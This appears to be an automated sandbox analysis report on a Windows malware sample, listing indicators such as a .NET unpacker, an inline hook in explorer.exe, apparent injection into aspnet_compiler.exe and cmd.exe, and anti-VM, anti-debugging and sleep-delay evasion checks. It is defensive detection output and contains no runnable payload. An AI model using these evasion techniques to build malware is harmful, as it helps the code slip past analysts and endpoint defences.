Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdb source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.267385039.0000000002640000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000003.00000003.268178554.0000000000F19000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000003.369800371.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.367713798.00000000028E9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: aspnet_compiler.pdb source: cmd.exe, 0000000E.00000002.524907250.00000000031EF000.00000004.10000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000002.521097994.00000000027ED000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BFXBNFDHDJNG.pdb source: U8RYIwIvfK.exe
Source:	Binary string: cmd.pdb source: aspnet_compiler.exe, 00000003.00000003.366743571.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000000.367246738.00000000001B0000.00000040.80000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: U8RYIwIvfK.exe, u206a????????????????????????????????????????.cs	.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.U8RYIwIvfK.exe.240000.0.unpack, u206a????????????????????????????????????????.cs	.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A9392A push dword ptr [ecx]; iretd	0_2_00A9393D
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Code function: 0_2_00A9A25E push 11BA938Bh; iretd	0_2_00A9A266
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0112D0D1 push ecx; ret	3_2_0112D0E4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001C76BD push ecx; ret	14_2_001C76D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001C76D1 push ecx; ret	14_2_001C76E4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_02C9D0D1 push ecx; ret	14_2_02C9D0E4

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE9

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 0000000000129904 second address: 000000000012990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 0000000000129B6E second address: 0000000000129B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe TID: 1104	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe TID: 3724	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 3_2_01116DE6 rdtsc

3_2_01116DE6

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	API coverage: 5.3 %
Source: C:\Windows\SysWOW64\cmd.exe	API coverage: 0.7 %

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001C245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	14_2_001C245C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001BB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	14_2_001BB89C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001C68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	14_2_001C68BA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001D31DC FindFirstFileW,FindNextFileW,FindClose,	14_2_001D31DC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 14_2_001B85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	14_2_001B85EA

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: explorer.exe, 00000004.00000000.328931675.00000000084D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.344274153.00000000045B0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.351265830.00000000081DD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
Source: explorer.exe, 00000004.00000000.320881970.0000000006710000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: explorer.exe, 00000004.00000000.326654154.0000000008304000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.294164608.00000000082B2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000004.00000000.351359914.0000000008200000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe

Code function: 0_2_00A9B950 CheckRemoteDebuggerPresent,

0_2_00A9B950

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 14_2_001D2258 IsDebuggerPresent,

14_2_001D2258

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 14_2_001BAC30 GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,

14_2_001BAC30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 3_2_01116DE6 rdtsc

3_2_01116DE6

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D9100 mov eax, dword ptr fs:[00000030h]	3_2_010D9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D9100 mov eax, dword ptr fs:[00000030h]	3_2_010D9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D9100 mov eax, dword ptr fs:[00000030h]	3_2_010D9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0119E539 mov eax, dword ptr fs:[00000030h]	3_2_0119E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0115A537 mov eax, dword ptr fs:[00000030h]	3_2_0115A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110513A mov eax, dword ptr fs:[00000030h]	3_2_0110513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110513A mov eax, dword ptr fs:[00000030h]	3_2_0110513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01104D3B mov eax, dword ptr fs:[00000030h]	3_2_01104D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01104D3B mov eax, dword ptr fs:[00000030h]	3_2_01104D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01104D3B mov eax, dword ptr fs:[00000030h]	3_2_01104D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A8D34 mov eax, dword ptr fs:[00000030h]	3_2_011A8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010F4120 mov eax, dword ptr fs:[00000030h]	3_2_010F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010F4120 mov eax, dword ptr fs:[00000030h]	3_2_010F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010F4120 mov eax, dword ptr fs:[00000030h]	3_2_010F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010F4120 mov eax, dword ptr fs:[00000030h]	3_2_010F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010F4120 mov ecx, dword ptr fs:[00000030h]	3_2_010F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]	3_2_010E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]	3_2_010E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]	3_2_010E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]	3_2_010E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]	3_2_010E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]	3_2_010E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]	3_2_010E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]	3_2_010E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]	3_2_010E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]	3_2_010E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]	3_2_010E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]	3_2_010E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]	3_2_010E3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DAD30 mov eax, dword ptr fs:[00000030h]	3_2_010DAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010FB944 mov eax, dword ptr fs:[00000030h]	3_2_010FB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010FB944 mov eax, dword ptr fs:[00000030h]	3_2_010FB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01113D43 mov eax, dword ptr fs:[00000030h]	3_2_01113D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01153540 mov eax, dword ptr fs:[00000030h]	3_2_01153540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010F7D50 mov eax, dword ptr fs:[00000030h]	3_2_010F7D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DC962 mov eax, dword ptr fs:[00000030h]	3_2_010DC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010FC577 mov eax, dword ptr fs:[00000030h]	3_2_010FC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010FC577 mov eax, dword ptr fs:[00000030h]	3_2_010FC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DB171 mov eax, dword ptr fs:[00000030h]	3_2_010DB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DB171 mov eax, dword ptr fs:[00000030h]	3_2_010DB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01102990 mov eax, dword ptr fs:[00000030h]	3_2_01102990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D2D8A mov eax, dword ptr fs:[00000030h]	3_2_010D2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D2D8A mov eax, dword ptr fs:[00000030h]	3_2_010D2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D2D8A mov eax, dword ptr fs:[00000030h]	3_2_010D2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D2D8A mov eax, dword ptr fs:[00000030h]	3_2_010D2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010D2D8A mov eax, dword ptr fs:[00000030h]	3_2_010D2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110FD9B mov eax, dword ptr fs:[00000030h]	3_2_0110FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110FD9B mov eax, dword ptr fs:[00000030h]	3_2_0110FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010FC182 mov eax, dword ptr fs:[00000030h]	3_2_010FC182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01102581 mov eax, dword ptr fs:[00000030h]	3_2_01102581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01102581 mov eax, dword ptr fs:[00000030h]	3_2_01102581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01102581 mov eax, dword ptr fs:[00000030h]	3_2_01102581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01102581 mov eax, dword ptr fs:[00000030h]	3_2_01102581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0110A185 mov eax, dword ptr fs:[00000030h]	3_2_0110A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01101DB5 mov eax, dword ptr fs:[00000030h]	3_2_01101DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01101DB5 mov eax, dword ptr fs:[00000030h]	3_2_01101DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01101DB5 mov eax, dword ptr fs:[00000030h]	3_2_01101DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011551BE mov eax, dword ptr fs:[00000030h]	3_2_011551BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011551BE mov eax, dword ptr fs:[00000030h]	3_2_011551BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011551BE mov eax, dword ptr fs:[00000030h]	3_2_011551BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011551BE mov eax, dword ptr fs:[00000030h]	3_2_011551BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011061A0 mov eax, dword ptr fs:[00000030h]	3_2_011061A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011061A0 mov eax, dword ptr fs:[00000030h]	3_2_011061A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011035A1 mov eax, dword ptr fs:[00000030h]	3_2_011035A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011569A6 mov eax, dword ptr fs:[00000030h]	3_2_011569A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A05AC mov eax, dword ptr fs:[00000030h]	3_2_011A05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A05AC mov eax, dword ptr fs:[00000030h]	3_2_011A05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01156DC9 mov eax, dword ptr fs:[00000030h]	3_2_01156DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01156DC9 mov eax, dword ptr fs:[00000030h]	3_2_01156DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01156DC9 mov eax, dword ptr fs:[00000030h]	3_2_01156DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01156DC9 mov ecx, dword ptr fs:[00000030h]	3_2_01156DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01156DC9 mov eax, dword ptr fs:[00000030h]	3_2_01156DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01156DC9 mov eax, dword ptr fs:[00000030h]	3_2_01156DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01188DF1 mov eax, dword ptr fs:[00000030h]	3_2_01188DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DB1E1 mov eax, dword ptr fs:[00000030h]	3_2_010DB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DB1E1 mov eax, dword ptr fs:[00000030h]	3_2_010DB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010DB1E1 mov eax, dword ptr fs:[00000030h]	3_2_010DB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010ED5E0 mov eax, dword ptr fs:[00000030h]	3_2_010ED5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_010ED5E0 mov eax, dword ptr fs:[00000030h]	3_2_010ED5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0119FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0119FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0119FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0119FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0119FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0119FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0119FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0119FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011641E8 mov eax, dword ptr fs:[00000030h]	3_2_011641E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01157016 mov eax, dword ptr fs:[00000030h]	3_2_01157016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01157016 mov eax, dword ptr fs:[00000030h]	3_2_01157016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01157016 mov eax, dword ptr fs:[00000030h]	3_2_01157016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A4015 mov eax, dword ptr fs:[00000030h]	3_2_011A4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_011A4015 mov eax, dword ptr fs:[00000030h]	3_2_011A4015
